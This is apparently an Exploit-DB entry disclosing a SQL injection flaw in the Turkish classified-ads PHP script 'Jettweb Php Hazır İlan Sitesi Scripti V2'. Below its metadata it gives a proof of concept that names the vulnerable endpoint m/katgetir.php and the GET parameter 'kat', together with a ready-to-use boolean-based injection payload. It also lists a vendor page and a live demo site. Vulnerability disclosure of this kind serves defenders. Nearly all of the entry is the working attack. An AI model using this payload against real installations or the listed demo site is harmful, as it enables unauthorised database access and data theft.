Jettweb Php Hazır İlan Sitesi Scripti V2 - SQL Injection

Author: Ahmet Ümit BAYRAM
type: webapps
platform: php
port: 80.0
date_added: 2019-03-26 
date_updated: 2019-03-26 
verified: 0 
codes:  
tags: SQL Injection (SQLi)
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Jettweb Php Hazır İlan Sitesi Scripti V2 - SQL Injection
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/c-23-ilan-Siteleri.html
# Demo Site: http://ilanv2.proemlaksitesi.net
# Version: V2
# Tested on: Kali Linux
# CVE: N/A

----- PoC : SQLi -----

Request: http://localhost/[PATH]/m/katgetir.php?kat=1
Vulnerable Parameter: kat (GET)
Payload: kat=1' OR NOT 1300=1300-- rwTf